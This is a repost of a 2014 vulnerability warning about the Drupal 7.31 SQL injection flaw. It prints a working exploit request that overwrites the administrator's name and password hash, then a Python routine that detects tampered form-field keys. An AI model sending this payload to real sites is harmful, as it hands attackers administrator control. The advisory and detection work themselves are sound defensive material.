Serious SQL injection vulnerability disclosed in Drupal 7.31 - Vulnerability warning - the black bar safety net

ID MYHACK58:62201454723
Type myhack58
Reporter Anonymous
Modified 2014-10-16T00:00:00


This morning a foreign security researcher disclosed on Twitter the latest SQL injection vulnerability in Drupal 7.31 and published exploit (EXP) code for testing it. The editor set up a local Drupal 7.31 environment and tested it: the code executes successfully and adds an attacker-defined user to the database.

Test code (please do not use it for illegal purposes):

POST /drupal-7.31/?q=node&destination=node HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
Cookie: Drupal.toolbar.collapsed=0; Drupal.tableDrag.showWeight=0; has_js=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 231

name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in
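A detection check built on the request above, added here as an example (it is not code from the original page or from Drupal): the injected SQL travels inside the array subscript of the `name` form field, so a log or WAF filter can flag any POST parameter whose bracketed key contains characters other than letters, digits, underscore or hyphen. The function name, the allowed-character set and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Assumption: legitimate form fields use empty or simple-token subscripts,
# e.g. name[0], field[und][0][value], files[]
SAFE_SUBSCRIPT = re.compile(r"^[A-Za-z0-9_\-]*$")


def suspicious_keys(body):
    """Return decoded parameter names whose [subscript] part looks tampered with."""
    hits = []
    # Split on '&' only: ';' and '#' can legitimately appear inside a hostile key
    # and must not be treated as separators.
    for pair in body.split("&"):
        raw_key = pair.split("=", 1)[0]
        key = unquote_plus(raw_key)
        start = key.find("[")
        if start == -1:
            continue  # plain scalar field, nothing to inspect
        inner = key[start + 1:]
        if not inner.endswith("]"):
            # Unbalanced bracket, e.g. a raw '=' placed inside the subscript
            hits.append(key)
            continue
        subscripts = inner[:-1].split("][")
        if any(not SAFE_SUBSCRIPT.match(s) for s in subscripts):
            hits.append(key)
    return hits


# Constructed sample bodies (not captured traffic)
BENIGN = ("name=alice&pass=secret&form_build_id=form-abc"
          "&form_id=user_login_block&op=Log+in")
BENIGN_ARRAYS = "roles[2]=2&field[und][0][value]=x&files[]=a"
# Same key shape as the request above, with a harmless placeholder statement
SUSPECT = ("name[0%20;select+1;#%20]=test3&name[0]=test&pass=x"
           "&form_id=user_login_block&op=Log+in")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("arrays", BENIGN_ARRAYS),
                        ("suspect", SUSPECT)):
        print(label, suspicious_keys(body))
```

The same rule can be applied to request bodies recorded by a reverse proxy or WAF; a hit on `user_login_block` submissions is worth investigating because the normal login form sends `name` as a scalar.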
